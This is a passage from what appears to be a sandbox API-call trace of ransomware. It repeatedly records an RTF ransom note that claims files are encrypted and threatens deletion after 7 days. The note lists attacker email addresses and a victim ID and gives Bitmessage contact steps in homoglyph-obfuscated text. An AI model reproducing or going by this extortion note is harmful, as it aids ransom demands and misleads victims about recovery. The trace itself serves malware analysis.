th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.256] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0280.256] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2358878, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b 